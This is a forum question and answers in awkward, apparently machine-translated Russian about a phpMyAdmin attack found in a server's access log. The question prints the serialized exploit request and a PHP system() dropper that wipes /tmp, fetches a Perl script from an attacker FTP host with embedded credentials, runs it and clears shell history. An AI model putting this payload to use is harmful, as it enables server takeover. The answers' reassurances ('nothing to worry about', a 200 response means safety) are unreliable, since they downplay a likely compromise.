Подозрительный журнал http доступа.
Пожалуйста, помогите мне! Я понял, что в моем лог-файле http записано следующее.
action=lay_navigation&eoltype=unix&token=a13369792c1a33ec1130500ca821c5a4&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A47%3A%22ftp%3A%2F%2Fhawk1156%3ATuNPKPK123%40hawkish.co.uk%2Fieh.ico%22%3B%7D%7D
Когда я его декодирую, он становится
action=lay_navigation&eoltype=unix&token=a13369792c1a33ec1130500ca821c5a4&configuration=a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:47:"ftp://hawk1156:TuNPKPK123@hawkish.co.uk/ieh.ico";}}
Я забеспокоился о подозрительной FTP-ссылке и решил скачать ее.
wget ftp://hawk1156:TuNPKPK123@hawkish.co.uk/ieh.ico
Содержимое файла было таким:
<? system("cd /tmp;rm -rf *;wget ftp://hawk1156:TuNPKPK123@hawkish.co.uk/2.txt;perl 2.txt;curl -O hawk1156://ftp:TuNPKPK123@hawkish.co.uk/2.txt;perl 2.txt;fetch hawk1156://ftp:TuNPKPK123@hawkish.co.uk/2.txt;perl 2.txt;rm -rf 2.txt;history -c;");exit?>
Конечно, я никогда не выполнял его сам, но я не уверен, что мой сервер уже был взломан в этот момент , Что я должен делать? Я не знаю с чего начать.
2 ответа
Глядя на подозрительный комментарий system, команда, которую он пытается заставить вас выполнить, похоже, удаляет все в /tmp, , но нигде больше . Более того, подозрительный сайт был удален хостинг-провайдером, поэтому теперь беспокоиться не о чем. Обратите внимание, что соединения MySQL через сокеты и сервисы будут прерываться до следующей перезагрузки из-за удаления файлов из /tmp, но никакие данные не должны были быть потеряны (кроме вашей истории bash).
Я бы просто неофициально сообщил разработчику PHPMyAdmin, поэтому, если это не недостаток безопасности, который может быть использован не по назначению, сделка с ошибкой на самом деле не сделана.
В большом введенном коде выделены интересные биты команд:
<? system("cd /tmp;rm -rf * ... history -c;");exit?>
Также просматривается файл ftp://hawk1156:TuNPKPK123@hawkish.co.uk/2.txt, который, возможно, сделал что-то плохое, но так как я этого не делаю знать, что было в файле, и хостинг-провайдер снял учетную запись, нет никакого способа узнать, что он делает, если вам не удастся ext4undelete попытаться подсчитать ущерб. * Возможно, сделал что-то плохое. * Если вы действительно обнаружите файл утилитой восстановления, опубликуйте его здесь, и я с удовольствием посмотрю на него.
Редактировать: Благодаря январскому комментарию, который я не заметил, больше всего похоже, что эта атака создала IRC бота. Если все еще выполняется perl, и у вас нет критически важных служб, работающих на PERL, выполните:
sudo killall perl
или перезагрузитесь.
Да, кто-то пытается использовать уязвимость PMA (PhpMyAdmin) в вашей системе, пока ваш сервер возвращает 200 по этому запросу, с вами все будет в порядке.